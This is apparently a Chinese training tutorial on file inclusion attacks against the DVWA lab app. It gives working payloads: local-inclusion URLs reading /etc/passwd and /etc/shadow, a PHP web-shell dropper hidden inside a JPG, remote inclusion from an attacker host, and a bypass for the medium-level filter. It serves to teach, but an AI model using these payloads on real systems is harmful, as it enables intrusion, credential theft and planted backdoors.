3.2 文件包含漏洞渗透实战(OWASP实战训练)

3.2 文件包含漏洞渗透实战(OWASP实战训练)

上一节讲了本地文件包含和远程文件包含

本地文件包含需要将文件传上去或者不传上去(本地系统的一些文件)

我们是传不了PHP的文件,高安全级别下,如果能上传PHP文件,就不需要这么麻烦了,我们传图片,当然传图片上去不一定能用,本身还要找他的文件包含漏洞,如果传了一个包含生成一句话木马的图片上去,恰好又有文件包含漏洞,就可以执行图片在本地生成一句话木马PHP文件,这样就可以用菜刀这种攻击连接一句话木马,获取其webshell

上传图片,能被包含执行,可能会看到乱码,但是有正确的代码执行。

学习安全上来就攻击这个网站不可能,需要建立起基础体系,很多高手工具一点也看不懂,讲完后,可能也达不到随心所欲攻击的结果,这个课也不长,真要学的话也要学好几个月呢,但是可以保证再去看高手的攻击步骤就能看懂了。就可以开始自学或者使用了,否则开始看都看不懂,因为高手在写案例的时候不考虑基础。

原理及危害

Php.ini文件会影响到很多东西,如upload限制上传文件大小等,我们关注的是allow_url_include = on 开启允许包含能力,还需看开发人员是否包含你上传的文件。

远程文件包含真的没有用,应该关上(allow_url_fopen)

注意在# vim /etc/php5/cli/php.ini 此路径仅限于此靶机路径,你的服务器路径就可能不是这个路径了。

这个路径是需要有一定的运维能力才能去找到的。

3.低安全级别渗透

3.1本地文件包含漏洞

访问本地系统账号信息及其他敏感信息

http://192.168.56.103./dvwa/vulnerabilities/fi/?page=/etc/passwd
http://192.168.56.103./dvwa/vulnerabilities/fi/?page=/etc/shadow
http://192.168.56.103./dvwa/vulnerabilities/fi/?page=/etc/php5/apache2/php.ini
http://192.168.56.103./dvwa/vulnerabilities/fi/?page=/etc/mysql/my.cnf
http://192.168.56.103./dvwa/vulnerabilities/fi/?page=/etc/apache2/apache2.conf

http://192.168.56.103/dvwa/robots.txt
或者http://192.168.56.103/dvwa/vulnerabilities/fi/?page=/var/www/dvwa/robots.txt

这个robots每个网站都有名字相同

www.qfedu.com/robots.txt 我们的网站会被百度谷歌等浏览器爬取,这个robots.txt是一个爬取的公共协议,这里写的那些目录不能爬,那些能爬,百度就会遵循这个协议来爬取自己能爬的网站。当然有些恶意的爬取就不管这些协议了。这是爬取行业的一个规范。

但是往往这么写有另外的问题暴露了你的一些信息,所有这个

下面通过访问www.qfedu.com/robots.txt得到千锋的一些信息

#
# robots.txt for EmpireCMS	//此处使用 EmpireCMS来建立的站
#

User-agent: *
allow:http://www.qfedu.com/sitemap.xml
Disallow: /d/
Disallow: /e/class/
Disallow: /e/config/
Disallow: /e/data/
Disallow: /e/enews/
Disallow: /e/update/
Disallow: /js/
Disallow: /img/
Disallow: /css/
Disallow: /testdata/
Disallow: /testing/
Disallow: /ceshi/
Disallow: /*?*
Disallow: /*test.html
Disallow: /*test/
Disallow: /*test/*test.html
Disallow: /jingjia/*.html

//此处使用 EmpireCMS来建立的站,网站都是在人家的框架基础之上二次开发的,现在dede,帝国,CMS系统当然会有漏洞。

像这种通用的东西,能减少开发周期,后期维护也较为简单,但坏处也明显,一旦有什么漏洞,使用这个多的也中招。

Robots也是个敏感文件

本地文件包含后面可以跟密码、账号、系统信息、PHP配置、Apache配置像Robots之类的敏感文件,当然Robots这个文件谁都可以访问,只要知道这个名字。

3.2 本地文件包含漏洞+webshell

1.制作一句话图片木马 e.g. yangge.jpg

<?fputs(fopen("shell20.php", "w"),'<?php eval($_POST[yangge]);?>')?>

2.上传图片木马文件

3.执行文件包含并生成后门(并不是访问图片,将其内容包含在某个程序中执行)

4.通过菜刀连接webshell

提示:

/var/www/dvwa/hackable/uploads			//dvwa文件上传访问的目录 yangge.jpg
/var/www/dvwa/vulnerabilities/fi			//dvwa文件包含访问的目录 shell20.php

将生成木马程序添加到图片后大小变化很小。

下方是图片上传的位置

http://192.168.0.105/dvwa/hackable/uploads/hacker.jpg

所有静态资源服务器都不会执行,只有动态资源才会执行,我们要的不是把这个资源再请求回来,而是在服务器中被当成程序执行一遍。

http://192.168.0.105/dvwa/vulnerabilities/fi/?page=include.php

将这个图片包含执行后生成的文件在
http://192.168.0.105/dvwa/vulnerabilities/fi/

写全路径行吗,现在上传目录已有,文件包含目录也已有,刚才上传的图片在,现在是需要包含了,好像使用绝对路径有点问题,是不可以的,现在的话使用相对路径。

如果图片不行的话可能复制的一句话木马有问题

已经发现问题了,是代码的问题现在我在图片木马文件下建立了一个shell2.php里面是生成木马程序

只需点击a.bat文件在当前目录下打开cmd执行下方代码

copy meinv.jpg/b+shell2.php/a meinv3.jpg

就生成了meinv3.ipg图片木马,将其上传使用包含漏洞是可以执行的。

http://192.168.0.105/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/meinv2.jpg

执行上方的地址后下方会出现乱码,接着在上方的路径下能看到生成的PHP一句话木马。

接下来连接就没问题了

使用菜刀连接此地址

http://192.168.0.105/dvwa/vulnerabilities/fi/shell20.php

密码yangge这样就连接上了。

其实我们可以上传图片木马,也可以建一个txt文件在里面写上生成木马程序,当此文件被包含的时候和图片木马一样也能在其服务器上生成shell20.php木马文件。

在/var/www下建立一个txt文件包含以下内容。

<?fputs(fopen("shell50.php", "w"),'<?php eval($_POST[yangge]);?>')?>

3.3远程文件包含漏洞

这就不是那么费劲了。只要我们搭建一个服务器将图片放上去,再将图片包含进去即可,此时使用路径http://192.168.0.107/meinv2.jpg

这个路径在另一个owasp上的根目录下,来验证远程包含

或者http://192.168.0.107/yangge.txt

接着执行

http://192.168.0.105/dvwa/vulnerabilities/fi/?page=http://192.168.0.107/yangge.txt

这时下方就没有乱码了,因为不像图片那样还有多余的数据会出现乱码。

接着再在被攻击的owasp中的/var/www/dvwa/vulnerabilities/fi 路径下看到新生成的shell50.php文件

这个远程文件包含是非常简单的只要将这个图片或者txt放在自己准备的服务器上就行了。或者攻击一个网站将含有木马的图片上传其服务器上。

也可以是其他后缀的图片文件之类的。

我们使用上传和包含的漏洞进行的。

很显然远程包含效率要高一些。

将file inclusion安全级别调为中级

先来到文件包含漏洞页面看一下源码

<?php 

    $file = $_GET['page']; // The page we wish to display  

    // Bad input validation 
    $file = str_replace("http://", "", $file); 
    $file = str_replace("https://", "", $file);         
?> 

中安全级别对本地文件包含漏洞利用没有任何影响,上传一个图片也是没问题的,和之前的一样。但是远程文件包含就有问题了,他会将你的http://变成了空,这样就无法远程包含了。

那如果这样写

http://192.168.0.105/dvwa/vulnerabilities/fi/?page=httphttp://://192.168.0.107/yangge.txt

这样就能访问生成木马了。

httphttp://://	-  http:// =http://

将file inclusion安全级别调为高级

那如果是高安全级别呢?

<?php 
         
    $file = $_GET['page']; //The page we wish to display  

    // Only allow include.php 
    if ( $file != "include.php" ) { 
        echo "ERROR: File not found!"; 
        exit; 
    }       
?> 

这包含特定文件,只要不是include.php就报错不执行。应编码,对于后期修改也是不灵活的,但也安全。

这种安全,但对开发人员来说比较痛苦。有可能要包含很多的文件。但还是对要包含的文件有些限制。

包含本身是正常的,要看其有无包含行为,并且其对包含文件没有检测才造成了这个漏洞。不要轻看这个,页面多了就可能犯错,后面会讲web漏扫,实际上一个网站不会告诉你有什么漏洞,所以要漏扫,扫出漏洞,通过漏扫软件,一旦扫出效果就和上方一样。

文件包含漏洞在整个排行不高,任何一个点不安全都会导致权限被拿走。

下一讲会讲到sql注入,这是排在第一位的安全问题。

相关推荐
Smile灬凉城66620 分钟前
CTF之密码学(键盘加密)
安全·web安全·密码学
尘佑不尘4 小时前
蓝队基础,了解企业安全管理架构
数据库·笔记·安全·web安全·蓝队
山兔14 小时前
网络安全审计机制与实现技术
安全·web安全·php
黑客Ash5 小时前
网络安全提示
网络·安全·web安全
网络安全-杰克5 小时前
网络安全服务(Network Security Services, NSS)
安全·web安全
Ting丶丶5 小时前
安卓应用安装过程学习
android·学习·安全·web安全·网络安全
小宇python6 小时前
动态调试对安全研究有什么帮助?
网络·安全·web安全
Hacker_xingchen6 小时前
网络安全之内网安全
网络·安全·web安全
黑客KKKing7 小时前
网络安全-企业环境渗透2-wordpress任意文件读&&FFmpeg任意文件读
安全·web安全·ffmpeg